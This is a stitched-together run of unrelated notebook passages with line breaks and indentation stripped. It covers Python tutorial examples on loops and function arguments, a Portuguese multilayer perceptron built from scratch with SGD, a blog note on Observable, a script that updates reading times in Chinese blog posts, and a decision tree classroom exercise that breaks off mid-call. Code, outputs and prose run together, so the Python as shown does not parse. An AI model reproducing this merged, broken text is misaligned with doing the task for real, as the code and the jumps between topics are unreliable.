print('Zero') elif x == 1: print('Single') else: print('More')Single`for` StatementsThe `for` statement in Python differs a bit from what you may be used to in C or Pascal. Rather than always iterating over an arithmetic progression of numbers (like in Pascal), or giving the user the ability to define both the iteration step and halting condition (as C), Python’s `for` statement iterates over the items of any sequence (a list or a string), in the order that they appear in the sequence. For example (no pun intended):# Measure some strings: words = ['cat', 'window', 'defenestrate'] for w in words: print(w, len(w))cat 3 window 6 defenestrate 12If you need to modify the sequence you are iterating over while inside the loop (for example to duplicate selected items), it is recommended that you first make a copy. Iterating over a sequence does not implicitly make a copy. The slice notation makes this especially convenient:for w in words[:]: # Loop over a slice copy of the entire list. if len(w) > 6: words.insert(0, w) wordsWith `for w in words:`, the example would attempt to create an infinite list, inserting `defenestrate` over and over again. 
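A small aside, not from the tutorial text itself: in modern Python the same "loop over a copy" idea is usually written with `list.copy()` (or by building a new list), which avoids the slice notation:

```
words = ['cat', 'window', 'defenestrate']

# Iterate over an explicit copy while mutating the original list
for w in words.copy():
    if len(w) > 6:
        words.insert(0, w)

words
```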
The `range` Functionfor i in range(5): print(i)0 1 2 3 4_other ranges:_```range(5, 10) 5, 6, 7, 8, 9range(0, 10, 3) 0, 3, 6, 9range(-10, -100, -30) -10, -40, -70```a = ['Mary', 'had', 'a', 'little', 'lamb'] for i in range(len(a)): print(i, a[i]) print(range(10)) list(range(5))`break` and `continue` Statements, and `else` Clauses on Loopsfor n in range(2, 10): for x in range(2, n): if n % x == 0: print(n, 'equals', x, '*', n//x) break else: # loop fell through without finding a factor print(n, 'is a prime number')2 is a prime number 3 is a prime number 4 equals 2 * 2 5 is a prime number 6 equals 2 * 3 7 is a prime number 8 equals 2 * 4 9 equals 3 * 3When used with a loop, the `else` clause has more in common with the `else` clause of a `try` statement than it does that of `if` statements: a `try` statement’s `else` clause runs when no exception occurs, and a loop’s `else` clause runs when no `break` occurs.for num in range(2, 10): if num % 2 == 0: print("Found an even number", num) continue print("Found a number", num)Found an even number 2 Found a number 3 Found an even number 4 Found a number 5 Found an even number 6 Found a number 7 Found an even number 8 Found a number 9`pass` Statementsclass MyEmptyClass: pass def initlog(*args): pass # Remember to implement this!Defining Functionsdef fib(n): # write Fibonacci series up to n """Print a Fibonacci series up to n.""" a, b = 0, 1 while a < n: print(a, end=' ') a, b = b, a+b print() # Now call the function we just defined: fib(2000) fib f = fib f(100) fib(0) print(fib(0)) # functions that don't return, return None. def fib2(n): # return Fibonacci series up to n """Return a list containing the Fibonacci series up to n.""" result = [] a, b = 0, 1 while a < n: result.append(a) # see below a, b = b, a+b return result f100 = fib2(100) # call it f100 # write the resultMore on Defining Functions Default Argument Valuesdef ask_ok(prompt, retries=4, reminder='Please try again!'): while True: ok = input(prompt) if ok in ('y', 'ye', 'yes'): return True if ok in ('n', 'no', 'nop', 'nope'): return False retries = retries - 1 if retries < 0: raise ValueError('invalid user response') print(reminder)This function can be called in several ways: - giving only the mandatory argument: `ask_ok('Do you really want to quit?')` - giving one of the optional arguments: `ask_ok('OK to overwrite the file?', 2)` - or even giving all arguments: `ask_ok('OK to overwrite the file?', 2, 'Come on, only yes or no!')`This example also introduces the in keyword. This tests whether or not a sequence contains a certain value.The default values are evaluated at the point of function definition in the defining scope, so thati = 5 def f(arg=i): print(arg) i = 6 f() # will print 55**Important warning:** The default value is evaluated only once. This makes a difference when the default is a mutable object such as a list, dictionary, or instances of most classes. 
For example, the following function accumulates the arguments passed to it on subsequent calls:def f(a, L=[]): L.append(a) return L print(f(1)) print(f(2)) print(f(3))[1] [1, 2] [1, 2, 3]If you don’t want the default to be shared between subsequent calls, you can write the function like this instead:def f(a, L=None): if L is None: L = [] L.append(a) return L print(f(1)) print(f(2)) print(f(3))[1] [2] [3]Keyword Argumentsdef parrot(voltage, state='a stiff', action='voom', type='Norwegian Blue'): print("-- This parrot wouldn't", action, end=' ') print("if you put", voltage, "volts through it.") print("-- Lovely plumage, the", type) print("-- It's", state, "!") parrot(1000) # 1 positional argument parrot(voltage=1000) # 1 keyword argument parrot(voltage=1000000, action='VOOOOOM') # 2 keyword arguments parrot(action='VOOOOOM', voltage=1000000) # 2 keyword arguments parrot('a million', 'bereft of life', 'jump') # 3 positional arguments parrot('a thousand', state='pushing up the daisies') # 1 positional, 1 keyword parrot() # required argument missing parrot(voltage=5.0, 'dead') # non-keyword argument after a keyword argument parrot(110, voltage=220) # duplicate value for the same argument parrot(actor='') # unknown keyword argument def function(a): pass function(0, a=0)Arbitrary Argument Listsdef cheeseshop(kind, *arguments, **keywords): print("-- Do you have any", kind, "?") print("-- I'm sorry, we're all out of", kind) for arg in arguments: print(arg) print("-" * 40) for kw in keywords: print(kw, ":", keywords[kw]) cheeseshop("Limburger", "It's very runny, sir.", "It's really very, VERY runny, sir.", shopkeeper="", client="", sketch="Cheese Shop Sketch") def concat(*args, sep="/"): return sep.join(args) concat("earth", "mars", "venus") concat("earth", "mars", "venus", sep=".")Unpacking Argument ListsThe reverse situation occurs when the arguments are already in a list or tuple but need to be unpacked for a function call requiring separate positional arguments. For instance, the built-in `range()` function expects separate _start_ and _stop_ arguments. If they are not available separately, write the function call with the `*`-operator to unpack the arguments out of a list or tuple. In the same fashion, dictionaries can deliver keyword arguments with the `**`-operatorlist(range(3, 6)) # normal call with separate arguments args = [3, 6] list(range(*args)) # call with arguments unpacked from a list def parrot(voltage, state='a stiff', action='voom'): print("-- This parrot wouldn't", action, end=' ') print("if you put", voltage, "volts through it.", end=' ') print("E's", state, "!") d = {"voltage": "four million", "state": "bleedin' demised", "action": "VOOM"} parrot(**d)-- This parrot wouldn't VOOM if you put four million volts through it. E's bleedin' demised !Lambda ExpressionsSmall anonymous functions. They can be returned from other functions or accepted as arguments.def make_incrementor(n): return lambda x: x + n f = make_incrementor(42) f(0) f(1) pairs = [(1, 'one'), (2, 'two'), (3, 'three'), (4, 'four')] pairs.sort(key=lambda pair: pair[1]) pairsConstruindo Um Algoritmo Para Rede Neural Multilayer Perceptron Otimização com Stochastic Gradient Descent Stochastic Gradient Descent (SGD) é uma versão de Gradient Descent, onde em cada passagem para a frente, obtemos um lote de dados com amostras aleatórias do conjunto de dados total. Aqui onde entra em cena o batch_size. Esse é o tamanho do lote. 
Idealmente, todo o conjunto de dados seria alimentado na rede neural em cada passagem para a frente, mas na prática isso acaba não sendo possível, devido a restrições de memória. SGD é uma aproximação de Gradient Descent, quanto mais lotes processados pela rede neural, melhor será a aproximação. Uma implementação do SGD envolve:1. Gerar lotes de dados de amostras aleatórias do conjunto de dados total.2. Executar a rede para frente (Forward Pass) e para trás (Backward pass) para calcular o gradiente (com dados de (1)).3. Aplicar a atualização de descida do gradiente.4. Repitir as etapas 1-3 até a convergência ou o loop for parado por outro mecanismo (como o número de épocas, por exemplo).Se tudo correr bem, a perda da rede vai diminuindo, indicando pesos e bias mais úteis ao longo do tempo.import numpy as np class Neuronio: """ Classe base para os nós da rede. Argumentos: "nodes_entrada": Uma lista de nós com arestas para este nó. """ def __init__(self, nodes_entrada = []): """ O construtor do nó (é executado quando o objeto é instanciado). Define propriedades que podem ser usadas por todos os nós. """ # Lista de nós com arestas para este nó. self.nodes_entrada = nodes_entrada # Lista de nós para os quais este nó gera saída. self.nodes_saida = [] # O valor calculado por este nó. É definido executando o método forward(). self.valor = None # Este objeto é um dicionário com pares chaves/valor entre {} # As chaves (keys) são os inputs para este nó e o valores (values) são as paciais deste nó em relação ao input. self.gradientes = {} # Configuramos este nó como um nó de saída para todos os nós de entrada. for n in nodes_entrada: n.nodes_saida.append(self) def forward(self): """ Todo o nó que usar essa classe como uma classe base, precisa definir seu próprio método "forward". """ raise NotImplementedError def backward(self): """ Todo o nó que usar essa classe como uma classe base, precisa definir seu próprio método "backward". """ raise NotImplementedError class Input(Neuronio): """ Input genérico para a rede. """ def __init__(self): # O construtor da classe base deve ser executado para configurar todas as propriedades aqui. # # A propriedade mais importante de Input é valor. # self.valor é definido na função topological_sort(). Neuronio.__init__(self) def forward(self): # Nada a ser feito aqui. pass def backward(self): # Um nó de Input não possui entradas (pois ele já é a entrada) e assim o gradiente (derivada) é zero. # A palavra reservada "self", é referência para este objeto. self.gradientes = {self: 0} # Pesos e bias podem ser inputs, assim precisamos somar o gradiente de outros gradientes de saída for n in self.nodes_saida: self.gradientes[self] += n.gradientes[self] class Linear(Neuronio): """ Representa um nó que realiza transformação linear. """ def __init__(self, X, W, b): # O construtor da classe base (nó). # Pesos e bias são tratados como nós de entrada (nodes_entrada). Neuronio.__init__(self, [X, W, b]) def forward(self): """ Executa a matemática por trás da transformação linear. """ X = self.nodes_entrada[0].valor W = self.nodes_entrada[1].valor b = self.nodes_entrada[2].valor self.valor = np.dot(X, W) + b def backward(self): """ Calcula o gradiente com base nos valores de saída. """ # Inicializa um parcial para cada um dos nodes_entrada. self.gradientes = {n: np.zeros_like(n.valor) for n in self.nodes_entrada} # Ciclo através dos outputs. # O gradiente mudará dependendo de cada output, assim os gradientes são somados sobre todos os outputs. 
for n in self.nodes_saida: # Obtendo parcial da perda em relação a este nó. grad_cost = n.gradientes[self] # Definindo o parcial da perda em relação às entradas deste nó. self.gradientes[self.nodes_entrada[0]] += np.dot(grad_cost, self.nodes_entrada[1].valor.T) # Definindo o parcial da perda em relação aos pesos deste nó. self.gradientes[self.nodes_entrada[1]] += np.dot(self.nodes_entrada[0].valor.T, grad_cost) # Definindo o parcial da perda em relação ao bias deste nó. self.gradientes[self.nodes_entrada[2]] += np.sum(grad_cost, axis = 0, keepdims = False) class Sigmoid(Neuronio): """ Representa o nó da função de ativação Sigmoid. """ def __init__(self, node): # O construtor da classe base. Neuronio.__init__(self, [node]) def _sigmoid(self, x): """ Este método é separado do `forward` porque ele também será usado com "backward". `x`: Um array Numpy. """ return 1. / (1. + np.exp(-x)) def forward(self): """ Executa a função _sigmoid e define a variável self.valor """ input_value = self.nodes_entrada[0].valor self.valor = self._sigmoid(input_value) def backward(self): """ Calcula o gradiente usando a derivada da função sigmoid O método backward da classe Sigmoid, soma as derivadas (é uma derivada normal quando há apenas uma variável) em relação à única entrada sobre todos os nós de saída. """ # Inicializa os gradientes com zero. self.gradientes = {n: np.zeros_like(n.valor) for n in self.nodes_entrada} # Soma a parcial em relação ao input sobre todos os outputs. for n in self.nodes_saida: grad_cost = n.gradientes[self] sigmoid = self.valor self.gradientes[self.nodes_entrada[0]] += sigmoid * (1 - sigmoid) * grad_cost class MSE(Neuronio): def __init__(self, y, a): """ Função de custo para calcular o erro médio quadrático. Deve ser usado como último nó da rede. """ # Chamada ao construtor da classe base. Neuronio.__init__(self, [y, a]) def forward(self): """ Calcula o erro médio ao quadrado. """ # Fazemos o reshape para evitar possíveis problemas nas operações de matrizes/vetores # # Convertendo os 2 arrays (3,1) garantimos que o resultado será (3,1) e, assim, # teremos uma subtração elementwise. y = self.nodes_entrada[0].valor.reshape(-1, 1) a = self.nodes_entrada[1].valor.reshape(-1, 1) self.m = self.nodes_entrada[0].valor.shape[0] # Salva o output computado para o backward pass. self.diff = y - a self.valor = np.mean(self.diff**2) def backward(self): """ Calcula o gradiente do custo. """ self.gradientes[self.nodes_entrada[0]] = (2 / self.m) * self.diff self.gradientes[self.nodes_entrada[1]] = (-2 / self.m) * self.diff def topological_sort(feed_dict): """ Classifica os nós em ordem topológica usando o Algoritmo de Kahn.     `Feed_dict`: um dicionário em que a chave é um nó `Input` e o valor é o respectivo feed de valor para esse nó.     Retorna uma lista de nós ordenados. """ input_nodes = [n for n in feed_dict.keys()] G = {} nodes = [n for n in input_nodes] while len(nodes) > 0: n = nodes.pop(0) if n not in G: G[n] = {'in': set(), 'out': set()} for m in n.nodes_saida: if m not in G: G[m] = {'in': set(), 'out': set()} G[n]['out'].add(m) G[m]['in'].add(n) nodes.append(m) L = [] S = set(input_nodes) while len(S) > 0: n = S.pop() if isinstance(n, Input): n.valor = feed_dict[n] L.append(n) for m in n.nodes_saida: G[n]['out'].remove(m) G[m]['in'].remove(n) if len(G[m]['in']) == 0: S.add(m) return L def forward_and_backward(graph): """ Executa uma passagem para a frente e uma passagem para trás através de uma lista de nós ordenados.      Argumentos:          `Graph`: O resultado de `topological_sort`. 
""" # Forward pass for n in graph: n.forward() # Backward pass # O valor negativo no slice permite fazer uma cópia da mesma lista na ordem inversa. for n in graph[::-1]: n.backward() def sgd_update(params, learning_rate = 1e-2): """ Atualiza o valor de cada parâmetro treinável com o SGD. Argumentos:          `Trainables`: uma lista de nós `Input` que representam pesos / bias.          `Learning_rate`: a taxa de aprendizado. """ # Executa o SGD # # Loop sobre todos os parâmetros for t in params: # Alterar o valor do parâmetro, subtraindo a taxa de aprendizado # multiplicado pela parte do custo em relação a esse parâmetro partial = t.gradientes[t] t.valor -= learning_rate * partialExecutando o Grafo http://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_boston.htmlimport numpy as np from sklearn.datasets import load_boston from sklearn.utils import shuffle, resample import matplotlib.pyplot as plt %matplotlib inline # Carrega os dados X_, y_ = load_boston(return_X_y=True) print(f'variaveis preditoras/esplicativas tem o shape de: {X_.shape}.') # Normaliza os dados X_ = (X_ - np.mean(X_, axis = 0)) / np.std(X_, axis = 0) # Número de features e número de neurônios n_features = X_.shape[1] n_hidden = 10 # Define valores randômicos para inicializar pesos e bias W1_ = np.random.randn(n_features, n_hidden) b1_ = np.zeros(n_hidden) W2_ = np.random.randn(n_hidden, 1) b2_ = np.zeros(1)Antes de seguir, quem consegue explicar o que está ocorrendo acima?# Rede Neural # Prestem atenção no que faz a classe Input assim como as carácteristicas de Herança e sobrecarga X, y = Input(), Input() W1, b1 = Input(), Input() W2, b2 = Input(), Input() l1 = Linear(X, W1, b1) s1 = Sigmoid(l1) l2 = Linear(s1, W2, b2) cost = MSE(y, l2) # Define o feed_dict feed_dict = { X: X_, y: y_, W1: W1_, b1: b1_, W2: W2_, b2: b2_ } # Número de epochs (altere esse valor para ver as mudanças no resultado) epochs = 1000 # Número total de exemplos m = X_.shape[0] # Batch size batch_size = 11 steps_per_epoch = m // batch_size # Define o grafo computacional graph = topological_sort(feed_dict) #for j in graph: # print(j.__class__.__name__) # Valores que serão aprendidos pela rede params = [W1, b1, W2, b2] # Número total de exemplos print("Número Total de Exemplos = {}".format(m)) cost = [] # Treinamento do modelo for i in range(epochs): loss = 0 for j in range(steps_per_epoch): # Passo 1 - Testa aleatoriamente um lote de exemplos X_batch, y_batch = resample(X_, y_, n_samples = batch_size) # Reset dos valores de X e y X.valor = X_batch y.valor = y_batch # Passo 2 - Forward e Backpropagation forward_and_backward(graph) # Passo 3 - Otimização por SGD sgd_update(params) loss += graph[-1].valor cost.append(loss/steps_per_epoch) print("Epoch: {}, Custo: {:.3f}".format(i+1, loss/steps_per_epoch)) plt.plot(range(1, len(cost)+1), cost, marker = 'o') plt.title('Gráfico de loss x epoc') plt.xlabel('Iterações') plt.ylabel('Sum Squared Error - SSE') plt.show()Meeting Observable> Jupyter is jealous I read an article by on [JavaScript and the next decade of data programming](http://benschmidt.org/post/2020-01-15/2020-01-15-webgpu/) and it featured something called 'Observable'. An interactive notebook-like environment for JS that has some pretty compelling features. Today I had a bit of a play with it and I am hooked - I really like the way they handle cell execution flow, and I am so excited to use this to share data viz and interactive experiences with others without the need for a web server, colab, python install etc. 
And it is so useful being able to export a specific cell to use wherever - in fact this notebook will just display a few iframes from my Observable notebook. [Check it out for the full code and some extra thoughts.](https://observablehq.com/@johnowhitaker/meeting-observable)#hide from IPython.display import display, HTML display(HTML(""" """)) display(HTML(""" """))Dependenciesimport os import re from datetime import datetimeGet posts listFolder_list = ['../Dessert','../Main_Course'] Post_list = [] for folder in Folder_list: for root, directories, files in os.walk(folder, topdown=False): for name in files: print(os.path.join(root, name)) if '.md' in name: Post_list.append(os.path.join(root, name)) Post_listUpdate reading timefor post in Post_list: f = open(post, 'r') htmlmarkdown="".join(f.readlines()) match = re.search(r'\d{4}-\d{2}-\d{2}', post.split('/')[-1]) date = datetime.strptime(match.group(), '%Y-%m-%d').date() htmlmarkdown = re.sub(r"发布于\d+-\d+-\d+,阅读时间", "发布于{},阅读时间".format(date), htmlmarkdown) chinese_word = re.findall(r'[\u4E00-\u9FFF]',htmlmarkdown) print(len(chinese_word)) htmlmarkdown = re.sub(r"阅读时间:约\d+分钟", "阅读时间:约{}分钟".format(int(len(chinese_word)/200)), htmlmarkdown) with open(post, 'w') as new_file: new_file.write(htmlmarkdown)2465 2179 3119 1916 962 1224 749 862 1164 1280 1093 2537day14: Decision Tree Classifier Basics Objectives* Learn how to use *probabilistic* decision tree binary classifiers in sklearn* * Call `fit` to train them on provided labeled dataset* * Call `predict_proba` to get probabilistic predictions (will give you multiple columns, one per possible label)* * * use `predict_proba(...)[:,1]` to get just the probabilities of the positive class* * Call `predict` to get hard binary decisions* See tradeoffs as a function of different hyperparameters* * max_depth* * min_samples_per_leaf* * We'll reuse the same examples from our experience with Logistic Regression and kNN to provide some common ground Outline* [Part 1: Binary classification with Decision Trees on 1-dim. toy example](part1)* [Part 2: Inspecting learned tree structure on toy example](part2)* [Part 3: Visualizing decision boundaries of Decision Trees on 2-dim. features](part3)* [Part 4 (Bonus): Inspecting learned tree structure on 2-dim. example](part4)We expect you'll get through part 3 during this class period. Takeaways* Decision trees produce piecewise constant decision boundaries (as function of features)* * These boundaries are *axis aligned*, meaning they are always parallel or perpendicular to one of the "elementary" directions in the feature space (along x1 axis, along x2 axis, etc)import numpy as np import sklearn.tree # import plotting libraries import matplotlib import matplotlib.pyplot as plt %matplotlib inline plt.style.use('seaborn') # pretty matplotlib plots import seaborn as sns sns.set('notebook', font_scale=1.25, style='whitegrid')Setting up a simple classification task with 1-dim features Let's think about a classification task where:Each input is just scalar $x$ between -1 and +1.The "true" label assignment function is as follows:$$y(x) = \begin{cases} 1 & \text{if} ~ x > 0 \\0 & \text{otherwise}\end{cases}$$The true labeling process also has some noise: after assigning a label with the above function, each example has a ~15% chance of the opposite label. This noise makes our classification interesting. The "best case" error rate is about ~15%. Make training set for 1-dim. toy example# We generated this training set for you. 
N = 12 x_tr_N = np.asarray([ -0.975, -0.825, -0.603, -0.378, -0.284, -0.102, 0.169, 0.311, 0.431, 0.663, 0.795, 0.976]) x_tr_N1 = x_tr_N.reshape((N,1)) # need an (N,1) shaped array for later use with sklearn y_tr_N = np.asarray([0, 1, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1]) plt.plot(x_tr_N, y_tr_N, 'ks', label='training set'); plt.xlabel('x'); plt.ylabel('y'); plt.legend(bbox_to_anchor=(1.0, 0.5));Make validation set for 1-d toy exampledef make_dataset(n_examples=10, seed=101, flip_fraction=0.15): N = int(n_examples) prng = np.random.RandomState(seed) # Make x values between -1 and 1, roughly evenly spaced x_N = np.linspace(-1, 1, N) + 0.05 * prng.randn(N) # Make y values such that broadly, the true function says: # y_n = 1 if x_n > 0 # y_n = 0 otherwise y_N = np.asarray(x_N > 0, dtype=np.int32) # flip a small percentage of the values chosen_ids = prng.permutation(np.arange(N))[:int(np.floor(flip_fraction * N))] y_N[chosen_ids] = 1 - y_N[chosen_ids] return x_N.reshape((N,1)), y_N M = 100 x_va_M1, y_va_M = make_dataset(n_examples=M, seed=201) plt.plot(x_tr_N, y_tr_N, 'ks', label='training set'); plt.plot(x_va_M1, y_va_M - 0.01, 'rs', label='validation set'); # add small vertical offset so you can see both sets plt.xlabel('x'); plt.ylabel('y'); plt.legend(bbox_to_anchor=(1.0, 0.5));Part 1: Train a decision tree model for F=1 dataSee the docs for DecisionTreeClassifier here: Here, we'll fit a decision tree probabilistic classifier to the above 1-dim. feature dataset.# We'll use max_depth = 2 for now. You could select it like any hyperparameter on validation data. tree_depth2 = sklearn.tree.DecisionTreeClassifier(max_depth=2) tree_depth2.fit(x_tr_N1, y_tr_N)Make predictions using our tree using `predict_proba`Remember, `predict_proba()` returns the probabilities of ALL possible labels: 0 and 1There will be two columns, one for each label.The first column is for the class corresponding to binary label 0.The second column is for the class corresponding to binary label 1.yproba_N2 = tree_depth2.predict_proba(x_tr_N1) print("yproba_N2") print("Shape: " + str(yproba_N2.shape)) print(yproba_N2)yproba_N2 Shape: (12, 2) [[0.5 0.5 ] [0.5 0.5 ] [0.5 0.5 ] [0.5 0.5 ] [1. 0. ] [1. 0. ] [0. 1. ] [0. 1. ] [0. 1. ] [0.66666667 0.33333333] [0.66666667 0.33333333] [0.66666667 0.33333333]]Exercise 1a: Obtain a 1D array of the predicted probas for *positive* class only** Input **: 2D array `yproba_N2` from above, with shape (N, 2)** Desired output **: We want a 1D array with shape (N,) whos entries contain the probabilities that the training examples are in the positive class.yproba1_N = np.zeros(N) # TODO fix meSetup : Prepare for a plot over dense grid of inputs# Create dense grid of L input examples from -1.5 to 1.5 # so we can better understand the learned predictions L = 101 dense_x_L1 = np.linspace(-1.5, 1.5, L).reshape((L,1)) # Apply our trained tree to make predictions along this grid # Uses the syntax [:,1] to access the column with index 1 (so we only get the probas for positive class) yproba1_dense_L = tree_depth2.predict_proba(dense_x_L1)[:,1]Plot: predicted probabilities vs. 
feature value at DEPTH = 2We can see that the predicted probabilities from Decision Trees are *piecewise constant*.plt.plot(x_tr_N, y_tr_N, 'ks', label='training set'); plt.plot(x_tr_N, yproba1_N, 'bd', label='Probability predictions on training set'); plt.plot(dense_x_L1, yproba1_dense_L, 'b-', label='Probability evaluated at dense grid') plt.xlabel('x'); plt.ylabel('y'); plt.legend(bbox_to_anchor=(1.0, 0.5)); plt.title("Decision Tree with depth=2")Discussion 2a: Why does this plot have piecewise constant probability predictions? TODO write your answer here. Try again with max_depth = 1 Decision Tree# Call sklearn.tree.DecisionTreeClassifier(...) with max_depth hyperparameter set to 1 tree_depth1 = sklearn.tree.DecisionTreeClassifier(max_depth=1) tree_depth1.fit(x_tr_N1, y_tr_N) depth1_yproba1_N = tree_depth1.predict_proba(x_tr_N1)[:,1] depth1_dense_yproba1_L = tree_depth1.predict_proba(dense_x_L1)[:,1] plt.plot(x_tr_N, y_tr_N, 'ks', label='training set'); plt.plot(x_tr_N, depth1_yproba1_N, 'bd', label='Probability predictions on training set'); plt.plot(dense_x_L1, depth1_dense_yproba1_L, 'b-', label='Probability evaluated at dense grid') plt.xlabel('x'); plt.ylabel('y'); plt.legend(bbox_to_anchor=(1.0, 0.5)); plt.title("Decision Tree with depth=1");Exercise 1c: Try again with a max_depth=6 Decision Treetree_depth6 = None # TODO call sklearn.tree.DecisionTreeClassifier(...) with max_depth hyperparameter set to 6 # Train the classifier, by calling fit using provided arrays x_tr_N1, y_tr_N tree_depth6 # TODO fixme depth6_yproba1_N = 0.5 * np.ones(N) # TODO call predict_proba on the training set, keep only the positive class probas depth6_yproba1_dense_L = 0.5 * np.ones(L) # TODO call predict_proba on the dense input array, keep only positive class probas plt.plot(x_tr_N, y_tr_N, 'ks', label='training set'); plt.plot(x_tr_N, depth6_yproba1_N, 'bd', label='Probability predictions on training set'); plt.plot(dense_x_L1, depth6_yproba1_dense_L, 'b-', label='Probability evaluated at dense grid') plt.xlabel('x'); plt.ylabel('y'); plt.legend(bbox_to_anchor=(1.0, 0.5)); plt.title("Decision Tree with depth=6")Part 2: What is stored inside a trained instance of DecisionTreeClassifierdef pretty_print_tree(tree_clf): # Has an attribute called tree_ which stores the entire # tree structure and allows access to low level attributes. The binary tree # tree_ is represented as a number of parallel arrays. The i-th element of each # array holds information about the node `i`. Node 0 is the tree's root. NOTE: # Some of the arrays only apply to either leaves or split nodes, resp. In this # case the values of nodes of the other type are arbitrary! # # Among those arrays, we have: # - left_child, id of the left child of the node # - right_child, id of the right child of the node # - feature, feature used for splitting the node # - threshold, threshold value at the node # - value, counts of each class observed in training examples that reach this node # Using those arrays, we can parse the tree structure: n_nodes = tree_clf.tree_.node_count children_left = tree_clf.tree_.children_left children_right = tree_clf.tree_.children_right feature = tree_clf.tree_.feature threshold = tree_clf.tree_.threshold # The tree structure can be traversed to compute various properties # such as: # * the depth of each node # * whether or not it is a leaf. 
node_depth = np.zeros(shape=n_nodes, dtype=np.int64) is_leaves = np.zeros(shape=n_nodes, dtype=bool) stack = [(0, -1)] # seed is the root node id and its parent depth while len(stack) > 0: node_id, parent_depth = stack.pop() node_depth[node_id] = parent_depth + 1 # If we have a test node if (children_left[node_id] != children_right[node_id]): stack.append((children_left[node_id], parent_depth + 1)) stack.append((children_right[node_id], parent_depth + 1)) else: is_leaves[node_id] = True print("The binary tree structure has %s nodes." % n_nodes) print("The tree structure is:") for i in range(n_nodes): if is_leaves[i]: n_class0 = tree_clf.tree_.value[i,0,0] n_class1 = tree_clf.tree_.value[i,0,1] proba1 = n_class1 / (n_class1 + n_class0) print("%snode=%s is a leaf node with p(y=1 | this leaf) = %.3f (%d training examples)" % ( node_depth[i] * "\t", i, proba1, n_class0 + n_class1)) else: print("%snode=%s is a test node: go to node %s if X[:, %s] <= %.2f else to " "node %s." % (node_depth[i] * "\t", i, children_left[i], feature[i], threshold[i], children_right[i], )) print()Display tree with depth 1pretty_print_tree(tree_depth1)The binary tree structure has 3 nodes. The tree structure is: node=0 is a test node: go to node 1 if X[:, 0] <= 0.03 else to node 2. node=1 is a leaf node with p(y=1 | this leaf) = 0.333 (6 training examples) node=2 is a leaf node with p(y=1 | this leaf) = 0.667 (6 training examples)Discussion 2a: Does this structure above align with the depth=1 visualization in Part 1?* Does the number of training examples assigned to each leaf make sense?* Does the probability predicted by each leaf make sense? Display tree with depth 2pretty_print_tree(tree_depth2)The binary tree structure has 7 nodes. The tree structure is: node=0 is a test node: go to node 1 if X[:, 0] <= 0.03 else to node 4. node=1 is a test node: go to node 2 if X[:, 0] <= -0.33 else to node 3. node=2 is a leaf node with p(y=1 | this leaf) = 0.500 (4 training examples) node=3 is a leaf node with p(y=1 | this leaf) = 0.000 (2 training examples) node=4 is a test node: go to node 5 if X[:, 0] <= 0.55 else to node 6. node=5 is a leaf node with p(y=1 | this leaf) = 1.000 (3 training examples) node=6 is a leaf node with p(y=1 | this leaf) = 0.333 (3 training examples)Discussion 2b: Does this structure above align with the depth=2 visualization in Part 1? 
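Optional sanity check (a minimal sketch reusing `tree_depth2` from Part 1): the lines below probe the tree just to the left and right of each learned split threshold; the predicted probability should only change when x crosses one of those splits, matching the piecewise-constant plot above.
# Internal nodes have feature index 0 in this 1-feature problem; leaves are marked with -2
split_x = np.sort(tree_depth2.tree_.threshold[tree_depth2.tree_.feature == 0])
probe_x = np.concatenate([split_x - 0.01, split_x + 0.01]).reshape((-1, 1))
# Columns: probed x value, predicted p(y=1 | x)
print(np.hstack([probe_x, tree_depth2.predict_proba(probe_x)[:, 1:]]))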
TODO discuss Display tree with depth 6pretty_print_tree(tree_depth6)Setup for Part 3 Define simple dataset of points in 2D spaceDon't worry about the details of this setup.Just try to understand the plots below.def create_2d_dataset(N=100, noise_stddev=0.1, random_state=0): random_state = np.random.RandomState(int(random_state)) mA_2 = np.asarray([1, 0]) covA_22 = np.square(noise_stddev) * np.eye(2) mB_2 = np.asarray([0, 0]) covB_22 = np.square(noise_stddev) * np.eye(2) mC_2 = np.asarray([0, 1]) covC_22 = np.square(noise_stddev) * np.eye(2) # Draw data from 3 "Gaussian" blobs xA_N2 = random_state.multivariate_normal(mA_2, covA_22, size=N) xB_N2 = random_state.multivariate_normal(mB_2, covB_22, size=N) xC_N2 = random_state.multivariate_normal(mC_2, covC_22, size=N) x_N2 = np.vstack([xA_N2, xB_N2, xC_N2]) y_N = np.hstack([np.ones(xA_N2.shape[0]), np.zeros(xB_N2.shape[0]), np.ones(xC_N2.shape[0])]) return x_N2, y_NCreate the dataset with 100 points per classx_N2, y_N = create_2d_dataset(N=100, noise_stddev=0.3)Define function to plot data as scatterpoints in 2ddef plot_pretty_data_colored_by_labels(x_N2, y_N): plt.plot(x_N2[y_N==0,0], x_N2[y_N==0,1], color='r', marker='x', linestyle='', markersize=5, mew=2, label='y=0'); plt.plot(x_N2[y_N==1,0], x_N2[y_N==1,1], color='b', marker='+', linestyle='', markersize=8, mew=2, label='y=1'); plot_pretty_data_colored_by_labels(x_N2, y_N); plt.legend(bbox_to_anchor=(1.0, 0.5)); plt.xlabel('x_1'); plt.ylabel('x_2'); plt.gca().set_aspect(1.0); plt.xticks([0, 1, 2]); plt.yticks([0, 1, 2]); plt.title("Binary classification example with 2-dim feature");Define function to make pretty plots of predicted probability color fieldsYou don't need to understand this in detail. Just a utility function.def plot_pretty_probabilities_for_clf( clf, do_show_colorbar=False, x1_ticks=np.asarray([0, 2, 4]), x2_ticks=np.asarray([0, 2, 4]), c_levels=np.linspace(0, 1, 100), c_ticks=np.asarray([0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]), x1_grid=np.linspace(-1, 2.3, 100), x2_grid=np.linspace(-1, 2.3, 100)): cur_ax = plt.gca() G = x1_grid.size H = x2_grid.size # Get regular grid of G x H points, where each point is an (x1, x2) location x1_GH, x2_GH = np.meshgrid(x1_grid, x2_grid) # Combine the x1 and x2 values into one array # Flattened into M = G x H rows # Each row of x_M2 is a 2D vector [x_m1, x_m2] x_M2 = np.hstack([x1_GH.flatten()[:,np.newaxis], x2_GH.flatten()[:,np.newaxis]]) # Predict proba for each point in the flattened grid yproba1_M = clf.predict_proba(x_M2)[:,1] # Reshape the M probas into the GxH 2D field yproba1_GH = np.reshape(yproba1_M, x1_GH.shape) cmap = plt.cm.RdYlBu my_contourf_h = plt.contourf(x1_GH, x2_GH, yproba1_GH, levels=c_levels, vmin=0, vmax=1.0, cmap=cmap) plt.xticks(x1_ticks, x1_ticks); plt.yticks(x2_ticks, x2_ticks); if do_show_colorbar: left, bottom, width, height = plt.gca().get_position().bounds cax = plt.gcf().add_axes([left+1.1*width, bottom, 0.03, height]) plt.colorbar(my_contourf_h, orientation='vertical', 